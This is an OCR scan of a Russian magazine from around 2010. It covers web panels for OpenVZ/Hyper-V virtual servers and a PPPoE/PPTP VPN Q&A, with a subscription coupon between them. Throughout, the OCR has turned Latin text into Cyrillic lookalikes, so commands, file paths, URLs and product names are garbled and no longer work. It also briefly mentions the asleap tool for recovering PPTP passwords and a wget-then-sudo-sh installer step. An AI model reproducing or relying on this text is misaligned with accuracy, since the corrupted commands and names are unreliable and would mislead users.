ІШЬ5_СЕМ_ѴЕК5І(Ж в файле сопК^/епѵігоптепіі.гЬ. 

У меня при: 

$ гаііз -ѵ 
Каііз 2.3.5 

\УеЪѴ2 работал стабильно и без проблем. 

Теперь настала очередь ѴѴеЪѴ2. В последнее время архивов 
разработчики не предлагают, поэтому будем ставить из СІЕ 
Добавим нужные пакеты: 

$ зибо арк-дек іпзкаіі дік-соге 

Создаем локальную копию репозитария \УеЪѴ2 : 

$ дік-сіопе дік : //діккиЪ. сот/зЪиаіЪгаЬба/ 
ѵѵеЬѵг .дік 

Переносим каталог ѵѵеЬѵг в более подходящее место, на- 
пример в /ѵаг. Установка не требуется, просто переходим 
внутрь каталога и запускаем: 

$ ссі хѵеЬѵг / 

$ зисЗо гиЬу зегірк/ зегѵег 
=> Воокіпд ЖСВгіск 

=> Каііз 2.3.5 арріісакіоп зкагкіпд оп 
ЬЩр://0. 0.0. 0:3000 
=> Саіі мікЪ. -сЗ Со бекаск 
=> Скгі-С Со зкикбоѵт зегѵег 
[2010-01-29 14:08:01] ШЕО МЕВгіск 1.3.1 



[2010-01-29 14:08:01] ШЕО гибу 1 . 8 . 6 (2007-09- 
24) [ І48б-1іпих] 

[2010-01-29 14:08:01] ШЕО 

ЖСВгіск: : НТТР8егѵег#зСагС : ріс3=б365 рогС=3000 

Консоль закрывать нельзя, это потушит серверный процесс, 
кроме того, в процессе обращения к ѴѴеЬѴ2 сюда будут 
выводиться логи. Впоследствии, когда все будет работать 
нормально, добавим в вызов параметр '-б': 

$ зисЗо гиЬу зсгірС/ зегѵег -сЗ 
=> ВооСіпд ШЕВгіск 

=> Каііз 2.3.5 аррІісаСіоп зСагСіпд оп 
кССр://0. 0.0. 0:3000 

И создадим простенький скрипт /егс/іпіг. б Дл/еЪѵг: 

сб /изг/1оса1/ѵ\геЪѵ2/ && /изг/Ьіп/гиЬу \ 

-б зсгірС/зегѵег 
ехіС 0 

Запускаем браузер и пробуем подключиться к указанно- 
му порту: Ьі:1:р://192. 168. 1.200:3000 /. Регистрируемся, 
используя логин «абтіп» и пароль «абтіп123». Основные на- 
стройки \УеЪѴ2 производятся в пяти вкладках — СопГаіпегз, 
ОЗ-ТетрІаііез, Сопй^игайопШез, ОрепѴ2 (старт и останов) и 
ІІзегз. Для пользователя с правами клиента доступны только 
Сотаіпегз и Регзопаііге (для смены персональной информа- 
ции) . В каждой вкладке находятся еще 3-4 дополнительных 
подпункта. 

Начнем с ІІзегз, в которой создаются, удаляются, активиру- 
ются и отключаются учетные записи. По умолчанию здесь 
уже имеется пользователь абтіп, выбираем его и для смены 
пароля нажимаем «Сііап§е Раззѵѵогб». Новые учетные записи 



ѴПОПІ 

ѴіопГ ( Ьіір: //8оигсеГог^е.пе1/ргоіесІ5 /ѵіопГ) 

— свободно распространяемая веб-панель для 
управления виртуальными частными серверами 
на базе ОрепѴ2. С ее помощью легко создавать и 
управлять виртуальными машинами. На дан- 
ный момент ѴіопГ доступна для КесШа!, Рейога и 
СепЮ8. 
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Редактируем конфигвѴѴеЬѴ2 



создаются достаточно просто, при этом пользователь может 
получить права администратора (Асітіпізігайоп) или кли- 
ента (СНепО . 

В ОЗ-ТетрІаГез находим список установленных шабло- 
нов для ОрепѴ2. Используя гиперссылки, можно удалить 
шаблон, скопировать его на удаленный сервер, пересобрать 
шаблон из контейнера, здесь же доступна ссылка на другие 
шаблоны на сайте ОрепѴ2. 

Чтобы создать новый контейнер, выбираем СоШаіпегз — 
Иеѵѵ Сопііаіпег и заполняем предложенную форму, указав 
или выбрав при помощи раскрывающего списка владельца, 
ОС, файл настроек, ГО, имя, ІР-адрес, имя узла, ИИ5-сервер и 
пароль гоог. После нажатия кнопки СгеаГе получим данные о 
созданном контейнере. Все достаточно просто и не требует 
какой-либо подготовки. Выбрав контейнер, его можно от- 
редактировать, удалить, перезагрузить, создать резервную 
копию и произвести миграцию. 

Если теперь перейти в ОЗ-ТеілрІагез — Ке-Сгеаге Тетріаге, 
получим возможность пересобрать шаблон из контейнера. 

ПАН ЕЛЬ УПРАВЛЕНИЯ НѴРЕКѴМ 

НурегѴМ (ІхсепГег.ог^) — популярная панель управления 
фермой как физических, так и виртуальных серверов 
(ѴР5ЛГО5) . Продуманный интерфейс, построенный с 
применением веб-технологий, позволяет создавать вир- 
туальные машины даже неискушенному пользователю. 
Несмотря на то, что НурегѴМ сделает за тебя достаточно 



Ргохтох ѴігШаІ 
Епѵігоптепі: 

Ргохтох ѴЕ ( Ьцр : / /рѵе.ргохтох.сот Лѵікі /Маіп 

Ра^е) — специализированный Ілпих дистрибутив 
для развертывания виртуальных серверов на 
базе ОрепѴХ и КѴМ. Сразу после установки поль- 
зователь получает полностью готовую систему 
виртуальных серверов промышленного уровня с 
управлением через т/ѵеЪ-интерфейс и поддержкой 
кластеризации, включая возможность миграции 
виртуальных окружений с одного узла на другой 
без остановки работы. 

Текущая версия — 1.5 
Лицензия — ОР 1 .Ѵ 2 

Размер инсталляционного 180 -образа — 327 Мб 

Этот дистрибутив ты найдешь на прилагаемом к 
журналу БѴТ)-диске. 



Ьіѵе Мі^гаіііоп 

Физические сервера нуждаются в обслуживании, обновлении ПО или 
замене аппаратных компонентов. В обычной ситуации, один сервер — 
одна ОС, проблема его временной остановки достаточно тривиальна, и 
отключение на пару минут может пройти незамеченным. А что делать, 
если одновременно работающих виртуальных серверов насчитывает- 
ся не один десяток? Их остановка может сильно ударить по репутации 
компании. Вот здесь на помощь приходит технология переноса вирту- 
альных машин между узлами кластера в реальном времени без их ос- 
тановки — Ьіѵе Мі^гаііоп. Такая технология присутствует в продуктах 
практически всех игроков — Нурег-Ѵ, ХепЕпІегргізе, ѴМт/ѵаге (называ- 
ется ѴМоНоп). При этом время переключения достаточно мало (около 
60-300 мс), клиенты даже не замечают, что ѴМ находится уже на другом 
сервере, а все ТСР-соединения сохраняются. 

Процесс выглядит достаточно просто: состояние ѴМ описывается на- 
бором файлов, которые доступны в общем хранилище как исходному, 
так и целевому серверу. В процессе инициализации через сеть перено- 
сятся лишь данные о точном состоянии ѴМ, в частности, памяти. Хотя 
относительно небольшой размер информации переносится практи- 
чески мгновенно, некоторые ячейки памяти успевают измениться, поэ- 
тому процесс повторяется несколько раз до полной синхронизации. 
Так как сетевые интерфейсы ѴМ виртуализированы, идентификаторы 
сохраняются, и подключения не разрываются. 



много работы, потратить некоторое время на его изучение 
и привыкнуть к особенностям панели все-таки придется. 

В настоящее время поддерживаются две технологии вир- 
туализации — 0репѴ2 и Хеп. В панели нет ограничений по 
единовременно используемым технологиями и плат- 
формам, их можно использовать в любой комбинации. 

Для удобства конфигурирования применяются системы 
планирования использования ресурсов (Кезоигсе Ріап), 
в которых указываются предустановки: количество ѴР 5, 
дисковая квота, гарантированное ОЗУ, трафики так далее. 
Интерфейс един как для Хеп, так и для 0репѴ2, большая 
часть параметров касается обеих технологий, но нужно 
быть внимательным, так как встречаются настройки 
«0репѴ2 Опіу» и «Хеп Опіу». 

Среди дополнительных возможностей панели 
НурегѴМ — управление сертификатами, настройками 
55Н, ввод команд оболочки, вывод списков сервисов 
и процессов с возможностью останавливать любые из 
них, отчеты по работе виртуальных машин. Внешний 
вид можно изменить при помощи скинов и цветовых 
схем, для быстрых каналов можно активировать под- 
держку Ді ах. 

В качестве меры безопасности предлагается указать диапа- 
зоны разрешенных ІР-адресов, с которых можно подклю- 
чаться к панели, и блокируемые айпишники. 

Некоторое время исходные коды НурегѴМ были закрыты, 
но после взлома серверов хостинг-провайдера Ѵазегѵ (июнь 
2009) ЬхЬаЪз поменяла лицензию на АСРЬ-3.0, а исходный 
код стал доступен в 5ѴИ репозитарии и в виде архивов. 
Установка проста, но поддерживаются только КНЕЬ-Ъазесі 
дистрибутивы (рекомендуется СепЮЗ) . В других системах 
можно даже не стараться, получим ошибку: «ТЫз Орегайп§ 
Зузиет І5 Сиггепйу N 01 : зиррогііесі». 

Скачиваем установочный скрипт и отправляем его на 
выполнение (в качестве параметра ѵігшаіігагіоп-іуре указы- 
вается тип виртуализации — хеп/орепѵг/ЖЖЕ) : 




НТТР://ѴѴѴШ 

"■ Г 

> Ііпкз 

• Сайтпроекта0репѴ2 
— орепѵг.ота 

• Шаблоны ОС 
для 0репѴ2 — ѵѵікі. 
орепѵг.ога/РоѵѵпІоасІ/ 
Іетріаіе/ргесгеаіесі 

• СайтѴѴеЬѴ2 — ѵѵеЬѵг. 
БІ.пеі 

• Сайт НурегѴМ — 
Іхсепіег.огд 

• Познакомиться с 
НурегѴМ можно здесь: 
ЬйрУ/бето.Ьѵрегѵт. 
сот:8888 

• Страница 5СѴММ 
2008 — пісгозой.сот/ 
зѵзіеппсепіег/ 
ѵіНиаІтасЫпет 
ападег 

• Библиоте- 
ка РоѵѵегЗНеЦ 
тападетепі ІЛэгагу 
(ог Нурег-Ѵ— 
сосіеріех.сопп 

• НѴРетоіе— обе. 
тзсіп.тісгозой.сопп/ 
НѴРетоІе 
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Процесс создания контейнера в 
ѴѴеЬѴ2 достаточно прост 




■ѵ й 111 л <4 Л 




^ ^ — й в С т 



Панельуправления НурегѴМ обла- 
даетбольшим количеством воз- 
можностей 




$ мдек -с Ъккр: / /сіоѵѵпіоасі. Іхсепкег . 
огд/сіоѵтіоасі/йурегѵт/ргосіисіііоп/ 
йурегѵт-іпзкаіі-тазкег . зй 
$ зисіо зЪ. . /йурегѵт-іпзкаіі-тазкег . зк 
--ѵіг1:иа1І2а^іоп-'Ьуре=орепѵ2 

Вот и вся установка. Если планируется развер- 
нуть целый кластер, то Ьурегѵт-іпзііаіі-тазшг. 
зЬ используем на первом сервере, в остальных 
случаях — Ьурегѵш-іпзііаіі-зіаѵе.зіі. 

ИНСТРУМЕНТЫ ДЛЯ УПРАВЛЕНИЯ НѴРЕК-Ѵ 

В последнее время Місгозоіт активно продвига- 
ет технологию Нурег-Ѵ, которая доступна в виде 
роли в ѴѴіпсіоѵѵз 2008 всех версий, или отде- 
льного продукта МІСШ 50 Й Нурег-Ѵ Зегѵег 2008 
(он, кстати, является бесплатным) . Нурег-Ѵ 
был детальным образом «проработан» в статье 
«Гиперактивная виртуальность» (Х_02_2009), 
поэтому не отвлекаемся на пение дифирамбов 
и описание возможностей, а сразу переходим к 
рассмотрению инструментов, упрощающих его 
настройку. 

Для локального и удаленного управления 
настройками Нурег-Ѵ предлагается достаточно 
много утилит, взять хотя бы для примера комп- 
лект «Нурег-Ѵ Тооіз», позволяющий управлять 
Нурег-Ѵ удаленно, или диспетчер Нурег-Ѵ 
(Нурег-Ѵ Мапа^ег) . Последний может устанав- 
ливаться на другом компьютере, работающем 
под управлением ѴѴіп2к8 и выше, вне зависи- 
мости от наличия на нем роли Нурег-Ѵ. При 
этом сам сервер, которым мы будем управлять, 
может быть развернут как в полном варианте, 
так и в сокращенном (Зегѵег Соге) . Пользовате- 
лям Ѵіз^а предлагается диспетчер для Нурег-Ѵ 
(5иррогі:.тісго5оД.сот/кЬ /952627 с обновле- 
нием шррогГтісгозоЙ.сот/кЬ /970203) . По- 
добный инструмент для ѴѴіп 7 не поставляется 
отдельно, он включен в комплект КетоШ Зегѵег 
Абтіпізітайоп Тооіз (ЪгѴѴіпсіоѵѵз 7 (К5АТ), куда 
входит еще ряд консолей, позволяющих настро- 
ить, помимо Нурег-Ѵ, сервисы Асгіѵе ОігесШгу, 
ОНСР, БЫЗ, файловый, КБР, а также компонен- 
ты ВіШоскег, СРО, ИеПѵогк Ьоасі Ва1апсіп§ и т.д . 
Ссылку для закачки К5АТ 1огѴѴіп7 не даю, ее 
очень просто найти через гугл. 

Для удаленного управления не забываем 
разрешить нужные соединения в настройках 
ѴѴіпсіо\ѵ5 Еігеѵѵаіі: 



> пекзй асІѵРігеѵ/аІІ Рігемаіі зек 
гиіе дгоир= "ШпсЬэмз Мападетепк 
Іпзкгитепкакіоп (Ѵ\/МІ) " пеѵг епаЫе=уез 

Также необходимо предоставить пользователю 
право на удаленный запуск БСОМ запросов в 
консоли БСОМспі^.ехе. 

В промышленной среде настройка удаленного 
доступа для большого количества пользова- 
телей с разными правами и возможностями 
превращается в довольно-таки нетривиальную 
задачу. Упростить все настройки, необхо- 
димые для удаленного управления Нурег-Ѵ, 
призван сценарий НѴКетоШ (Нурег-Ѵ КетоШ 
Мапа§етеш Сопй§игайоп ШІіГу, собе.тзбп. 
тісгозоЙ.сот/НѴКетоііе) . С его помощью 
можно добавить или удалить учетную запись, 
рабочую группу и домен, открыть нужные пор- 
ты в ѴѴЕ и диагностировать проблемы. 
Например, чтобы делегировать право пользова- 
телю, достаточно дать команду: 

> сзсгірк ЬѵгетоРе /асісі: зупаск\изег 

Удалить также просто: 

> сзсгірк Кѵгетоке /гешоѵе : зупаск\ 
изег 

Чтобы установить на клиенте исключение для 
ММС в ѴѴіпсіодѵз Рігеѵѵаіі, набираем: 

> сзсгірк йѵгешоРе .ѵ^зР /тшс : епаЫе 

Вывести и проверить текущую конфигурацию 
можно следующим образом: 

> сзсгірр йѵгешоРе .ѵ^зР /зйсж 
/РагдеР : сотриРегпате 

Среди других доступных инструментов 
следует отметить Нурег-Ѵ РоѵѵегзЬеІІ Зпар іп 

(ро\ѵегзЬе1Шѵрегѵ.сосіер1ех.сот) — небольшую 
программу, предназначенную для управления 
доступом и настройками удаленного Нурег-Ѵ 
сервера. В настоящее время разработчиками 
предлагаются лишь исходные тексты, и для его 
сборки потребуется Ѵізиаі Зшсііо. Библиотека 
РоѵѵегЗЬеІІ тапа§етеш БіЪгагу (ог Нурег-Ѵ 
(рзЬѵрегѵ.соберІех.сот) содержит около 80 



дополнительных РоѵѵегЗЬеІІ-команд, позво- 
ляющих добавлять, удалять, настраивать ѴМ, 
управлять виртуальным оборудованиям, рабо- 
тать с ѴНБ-файлами и получать информацию о 
текущем состоянии ѴМ. 

Веб-интерфейс управления Нурег-Ѵ ѴѴеЬ 
Мапа^ег (НѴѴѴМ, Ьѵѵші.сосІер1ех.сот), пред- 
ставляющий собой надстройку к провайдеру 
Ѵігшаіігагіоп ѴѴМІ, в настоящее время находит- 
ся в начальной стадии развития и позволяет 
лишь просмотреть список доступных ѴМ, но 
уже сейчас проекту сулят большое будущее. 
Небольшая утилита НурегѴ_Моп ( ѵ\алау. 
шшгуеш.сотЛооП.азрх) выдаст информацию 
о загруженности компонентов ѴМ в более 
удобной форме, чем обычный диспетчер за- 
дач ОС. И хотя НурегѴ_Моп не предназначен 
для повседневного мониторинга, он позволя- 
ет разобраться с тем, что происходит в ѴМ. 
Компания Сіггіх ЗузШтз порадовала системных 
администраторов и ІТ-специалистов, выпустив 
бесплатный продукт СКгіх Еззепгіаіз іог Нурег-Ѵ 
Ехргезз Ебійоп (беііѵег.сіигіх.сот/^о/сііігіх/ 
еЬѵехргезз) . С его помощью можно довольно 
просто управлять двумя хостами Нурег-Ѵ, кото- 
рые подключены к единому БіЪге СЬаппеІ или 
І5С5І хранилищу. 

И, наконец, самым мощным решением 
является диспетчер виртуальных компью- 
теров 5СѴММ 2008 (ЗузШт Сетег Ѵігшаі 
МасЫпе Мапа^ег, тісго^оЙ.сотЛѵзііетсешег/ 

ѵігШаІтасЫпетапаѵег) . он дает возможность 
управлять физической и виртуальной инфра- 
структурой, причем не только Нурег-Ѵ, но и 
Місгозоіт Ѵігшаі Зегѵег 2005, а также ѴМѵѵаге 
Е5Х/Е5ХІ, переносить физические в виртуаль- 
ную среду и многое другое. 

ЗАКЛЮЧЕНИЕ 

Инструменты удаленного управления 
позволяют на порядок упростить настройку 
любого количества виртуальных машин не 
только подготовленному администратору, 
но и пользователю, обладающему весьма 
поверхностными знаниями об исполь- 
зуемых технологиях. Очевидно, рынок 
решений виртуализации сегодня насыщен 
как никогда, и победит тот хостер, который 
предоставляет клиентам больше удобных 
инструментов, ц-ц 
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ВЫГОДА*ГАРАНТИЯ*СЕРВИС это ЛЕГКО! 





БУДЬ УМНЫМ! 

ХВАТИТ ПЕРЕПЛАЧИВАТЬ В КИОСКАХ! 
СЭКОНОМЬ 660 РУБ. НА ГОДОВОЙ ПОДПИСКЕ! 

Замучилися искать журнал в палатках и мага- 
зинах? Не хочешь тратить на это время? Не 
надо. Мы сами потратим время 
и привезем тебе новый выпуск X. 

Для жителей Москвы (в пределах МКАД) 
доставка может осуществляться 
бесплатно с курьером из рук в руки 
в течение трех рабочих дней с момента 
выхода номера на адрес офиса или 
на домашний адрес. 



Еще один удобный способ оплаты 
подписки на твое любимое издание — в любом 
рІШ из 72 000 платежных терминалах ОІѴѴІ (КИВИ) 
по всей России. 



ЕСТЬ ВОПРОСЫ? Звони по бесплатным телефонам 
8(495)780-88-29 (для москвичей) и 8(800)200-3-999 
(для жителей других регионов России, абонентов 
сетей МТС, БиЛайн и Мегафон). 

ВОПРОСЫ, ЗАМЕЧАНИЯ И ПРЕДЛОЖЕНИЯ ПО ПОДПИСКЕ НА ЖУРНАЛ 
ПРОСИМ ПРИСЫЛАТЬ НА АДРЕС іпГоІсРфс.ги 




1. Разборчиво заполни подписной купон и 
квитанцию, вырезав их из журнала, сделав 
ксерокопию или распечатав с сайта 

вЬор.дІс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
нижеперечисленных способов: 

• по электронной почте $иЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва. 

ул. Тимура Фрунзе, д. 11, стр. 44. 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется 
в день обработки купона и квитанции 
с номера, выходящего через один 
календарный месяц после оплаты. 

Например, если произвести оплату в январе, 
то подписку можно оформить с марта. 



СТОИМОСТЬ ЗАКАЗА: 

2100 РУБ. ЗА 12 МЕСЯЦЕВ 
1200 РУБ. ЗА 4 МЕСЯЦЕВ 

■ Единая цена по всей России. Доставка 
за счет издателя, в том числе курьером 



по Москве в пределах МКАД 



Л- 



ПОДПИСНОЙ КУПОН 



ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 


» 


□ на 6 месяцев 
| | на 12 месяцев 
начиная с 


20 г. 


^ прошу выслать бесплатный 
номер журнала 



I — I Доставлять журнал по почте 
' — ' на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

I I на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 



5ѴМ/АСК 



■ ■ Сергей «дгіпсіег» Яремчук дгіпгіеггазупаск.ги 

Мартин «игЬап.ргапкБіег» Пранкевич тагІіпОзупаск.ги 



Теневые _ 
магистрали Сети 

НАСТРОЙКА ѴРЫ В ВОПРОСАХ И ОТВЕТАХ 



Технология виртуальных частных сетей сегодня как никогда пользуется 
большой популярностью. Ее применяют провайдеры для подключения 
пользователей к интернету, системные администраторы объединяют при 
помощи ѴРЫ удаленные офисы, командировочные и надомные сотруд- 
ники, работающие вне корпоративной сети, подключаются ко внутрен- 
ним ресурсам компании по безопасному каналу. Технологий и протоко- 
лов разработано немало, все они имеют свои особенности, достоинства 
и недостатки, требуютспецифических настроек роутеров. Попробуем 
навести порядок в знаниях. 



КАКОЙ ТИП ѴРЫ ИСПОЛЬЗОВАТЬ ПРОВАЙ- 
ДЕРУ? Типичная для небольших городов или 
удаленных районов ситуация: кто-то поку- 
пает жирный канал и затем перепродает его 
желающим подключиться к интернету. Как 
правило, в этом случае параллельно создается 
локалка, через которую и обеспечивается 
подключение. Внутри ЬАЫ пользователи сами 
организуют внутренние сервисы, что является 
дополнительным стимулом к подключению. 
Для раздачи интернета в таком варианте луч- 
ше всего «подойдут» протоколы РРРоЕ и РРТР, 
наиболее популярные и удобные в классе Ьозі- 
Ио-пегѵѵогк. Почему эти, а не другие? Давай 
разберемся. 

Причины популярности РРРоЕ и РРТР баналь- 
ны: клиенты имеются во всех популярных 
ОС, включая *піх. Процесс подключения и 
настройки достаточно прост и не требует 
особой подготовки. В ѴѴіпсіоѵѵз РРРоЕ и РРТР 
поддерживаются из коробки, пользователю 
стоит лишь настроить новое подключение в 
разделе «Сетевые подключения». 

Конечно, это не догма, и часто выбор прото- 
кола зависит от предпочтений сисадмина, 
который будет все настраивать. Многие 
из администраторов посчитают более 
«удобным» ОрепѴРІЧ, который отлично 
защищен, прост в настройке и адаптирован 
для работы из-за ЫАТ. Но такое решение 
все-таки ориентировано именно на постро- 
ение ѴРЫ подключения, а не как средство 
организации доступа в интернет, со всеми 



вытекающими последствиями, в частности, 
отсутствием готового и удобного биллинга. 
К тому же клиентам потребуется установ- 
ка дополнительного ПО, что многими не 
приветствуется. Другой вариант — Б2ТР/ 
ІРзес — предпочтительнее с точки зрения 
безопасности, но значительно сложнее в 
настройках, поэтому, если его и предлагают 
провайдеры, то только как альтернативу 
РРРоЕ или РРТР для продвинутых и/или 
параноидальных пользователей. Если ты 
решил поднять платный ѴРЫ, чтобы другие 
юзеры или мелкие фирмы могли безопас- 
но подключаться к сервисам интернета, 
скрывать свой ІР, или же обходить блоки- 
ровку ІР на сайтах, отслеживающих регион 
посетителя, то кроме «традиционного» в 
таких случаях РРТР, следует обязательно 
предложить более защищенную альтернати- 
ву, вроде ОрепУРЫ или Ь2ТР/ІР5ес, снабдив 
пользователей подробными инструкциями 
по подключению. 

А вот выбор РРРоЕ или РРТР зависит от топо- 
логии и особенностей сети. 

ЗА И ПРОТИВ РРРОЕ Подключение по 
протоколу РРРоЕ (РоіпМо-роіпі: ргогосоі 
оѵег ЕНіетег, КЕС 2516) у клиентов обыч- 
но вызывает меньше проблем, поскольку 
пользователю всего лишь нужно помнить 
свой логин и пароль. Причем процесс 
настройки прост как в ѴѴіпсіоѵѵз, так и в *піх 
системах. Учитывая, что РРР соединение 



можно шифровать, раскрыть передаваемые 
данные нельзя. Поиск сервера провайдера 
производится автоматически при помощи 
широковещательного РАБІ-пакета (РРРоЕ 
Асгіѵе Пізсоѵегу ІпШаііоп), передаваемого на 
канальном уровне, то есть клиенту не нужно 
задавать ІР-адрес сервера доступа, как при 
настроке РРТР. Более того, в сети парал- 
лельно может работать несколько серверов, 
которые одновременно отвечают клиенту 
на запрос, а клиент сам решает, к какому из 
них он будет подключаться. Сервера никак 
не мешают друг другу, поэтому достаточно 
просто организовать резервирование РРРоЕ 
подключения. 

Просмотреть список доступных серверов в 
*піх можно запустив утилиту рррое-сіізсоѵегу, 
которая отправляет РАБІ пакет и выводит 
результат, имя сервера и его МАС-адрес. 

# рррое-сіізсоѵегу -I еЪЬ.0 
Ассезз-СопсепРгаРог : МТ-01 

Это и есть наш сервер. 

Если в сети несколько РРРоЕ серверов, и 
нужно подключиться к определенному, явно 
указываем его в настройках /ещ/ррр/реегз/ 
сЫ-ргоѵісІег: 

#папо/еІс/ррр/реегз/сІ5І-ргоѵісіег 

ріидіп гр-рррое.зо 
гр_рррое_ас МТ- 01 
еРАО 
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Использование второго сервера позволит также зарезервировать и 
другие полезные сервисы: БНСР, ИИ5 и прочие. Для РРРоЕ еще одним 
очевидным преимуществом является возможность использования про- 
стых средств аутентификации и проверки полномочий на базе протокола 
КАБШ5 . Недостатки РРРоЕ вытекают из его достоинств. Так как он ра- 
ботает только в сети ЕнЬетеЦ то использование транзитных ІР-маршру- 
тизаторов недопустимо. В крупных, разветвленных сетях поиск сервера 
обычно затягивается, а широковещательные пакеты могут «застревать» 
в роутерах. Поэтому РРРоЕ эффективен при использовании в относитель- 
но небольших или средних обособленных сетях. Также стоит отметить, 
что стабильная работа РРРоЕ через ѴѴіЕі не гарантируется: через неко- 
торое время может возникнуть «подвисание» соединения. Дія решения 
этой проблемы придется ставить дополнительный роутер на границе 
ѴѴіЕі и ѴѴігесІ ЬАЛ, который и будет подключаться к РРРоЕ серверу. 

Еще одна проблема, которая иногда всплывает — это размер МТО. Дело 
в том, что максимальный размер ЕіЬегпеі-пакета равен 1500 байт, а 
максимальный размер пакета, передаваемого через РРРоЕ, равен 1492 
байта (заголовок РРРоЕ — 6 байт и РРР Ргоіосоі ГО — 2 байта) . Некото- 
рые роутеры поддерживают технологию РаіЬ МТО Бізсоѵегу, которая 
запрещает фрагментацию пакетов. При этом оптимальный размер 
пакета определяется автоматически на основе сообщений ІСМР (тип 
3, код 4: Ега^гпетаюп Неесіесі апсі БЕ зеі, см. ѵѵллч/ѵ.оаѵ.пеіУтіггогз/ 
сібг.ЬгтІ) . То есть, если на каком-то этапе ІСМР пакеты блокируются, 
между хостами могут возникнуть проблемы с обменом данными. Про- 
верить МТО очень просто. Например, введем: 

> ріпд зупаск.ги -1 -1 1492 

Требуется фрагментация пакета, но установлен запрещающий флаг. 
Как видишь, пакет размером 1492 не прошел. По умолчанию в 



ѴѴіпсІоѵѵз устанавливается МТО для протокола РРРоЕ равное 1480 байт, 
но некоторые программы или драйвера могут его изменить. 

Чтобы установить свое значение, следует создать раздел (если его 
нет) НКЕУ_ШСАЬ_МАСНІПЕ\5у5і:ет\СиггетСотгоІ5еі\5егѵісе5\ 
ШІ5ѵ\шп\Рагатеіег5\Ргоі:осоІ5\0, в котором прописать три КЕС_ 
БѴѴОКБ параметра: 

- РгоРосоІТуре — 0x00000800; 

- РРРРгоРосоІТуре — 0x00000021; 

- РгоРосоІМТЮ — желаемое значение МТЮ в десятичном фор- 
мате . 

В Ілпих проще автоматически уменьшать размер передаваемого паке- 
та средствами рррб или і1сопй§. Для рррб добавляем такую настройку: 

# папо/еіс/ррр/рррое.соггі 

СЬАМРМЗ 5 = 1412 

В правиле используется не МТО, а фактический блок данных М55 
(Махітшп Зе^тепі: 5іге, максимальный размер сегмента), добавив 
к нему служебную инфу 40 байт (20 байт ІР и 20 байт ТСР) , получим 
МТО. 

При использовании іісопй^ вот так указываем МТО интерфейса: 

# іісопіід рррО три 1400 

ПЛЮСЫ И МИНУСЫ Р РТР Протокол РРТР (Роіпмо-роіпі Шппе1іп§ 
ргоіосоі) позволяет клиентскому компьютеру организовать подклю- 
чение к серверу через туннель в незащищенной сети. В РРТР кадры 
РРР инкапсулируются в ІР-пакеты, что позволяет соединяться с 
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ПРИ ПЕРЕСБОРКЕ ЯДРА НЕ ЗА- 
БУДЬ АКТИВИРОВАТЬ ПАРАМЕТ- 
РЫ ІР5ЕС 

сервером, который находится в другой сети. 
При создании туннеля в РРТР используется 
дополнительное (управляющее) ТСР-соеди- 
нение (порт 1723). После обмена служебны- 
ми сообщениями создается соединение для 
пересылки данных (протокол Сепегіс Коіліп^ 
Епсарзиіагіоп, СКЕ) . 

Как и РРРоЕ, РРТР достаточно прост в 
настройке. Однако пользователь, помимо ло- 
гина и пароля, должен знать еще ІР-адрес сер- 
вера. Трудности в этом никакой — просто еще 
один шаг в настройках. Понятно, что сервер, 
к которому подключаются клиенты, не обяза- 
тельно должен находиться в том же сегменте 
сети. Учитывая, что поддержка РРТР встроена 
в ѴѴіпсіоѵѵз «из коробки» (МІСГ 050 ІТ является 
одним из его разработчиков), этот прото- 
кол получил большую популярность. Нет 
проблем и при подключении из *піх систем, 
достаточно установить ррір-сііепі: ( ррЕрсНепі. 
зТпеЕ) . который есть в репозитариях и портах 
практически всех дистрибутивов. Из лицензи- 
онных соображений поддержка МРРЕ долгое 
время была доступна исключительно в виде 
патчей. Теперь МРРЕ встроен в ядра многих 
ОС. Например, поддержка шифрования МРРЕ 
появилась в ядре Ілпих версии 2.6.14, поэтому 
в настоящее время никаких дополнительных 
манипуляций производить не требуется. 

Для аутентификации используются следую- 
щие методы: РАР, СНАР, 5РАР, М5СНАР ѵі и ѵ2, 
ЕАР. Пользователь определяется по логину/ 
паролю, но слабая защищенность механизмов 
аутентификации делает РРТР сессии легкой 
добычей для злоумышленников. Протокол уяз- 
вим практически для всех видов атак: атаки на 
ЬМ-хеши, алгоритмы КС4, СНАР, М5СНАР ѵі и 
ѵ2 и так далее. За примером далеко ходить не 
нужно — утилита азіеар ГѵѵіІШаскІогзшЫ.сот/ 
АзІеар.ЬнтІ) призвана «восстанавливать» РРТР 
М5СНАР пароли. Как результат, от РРТР, как 
средства построения ѴРЫ (для чего он, собс- 
твенно, и планировался), многие отказались в 
пользу более защищенных решений. 

Проблему пытались решить, для чего к РРТР 
прикрутили ЕАР-ТЬЗ (ЕхіепзіЫе АиіЬепіісаііоп 
РгоШсоІ-Тгапзрогі: Ьауег Зесигпу) аутентифи- 
кацию. Хотя это и сделало процесс распозна- 
вания пользователя более безопасным, но 
не устранило все уязвимости, связанные с 




I Ш вгіпЛг:та1» Язлп^г2Ьаііі 

АКТИВАЦИЯ МР_СОММТКАСК_РРТР ПОЗВОЛИТ СОЗДАВАТЫУННЕЛ И 
РРТР 



передачей данных. Также следует напомнить, 
что при использовании РРТР изменяется мар- 
шрут по умолчанию, и в результате весь тра- 
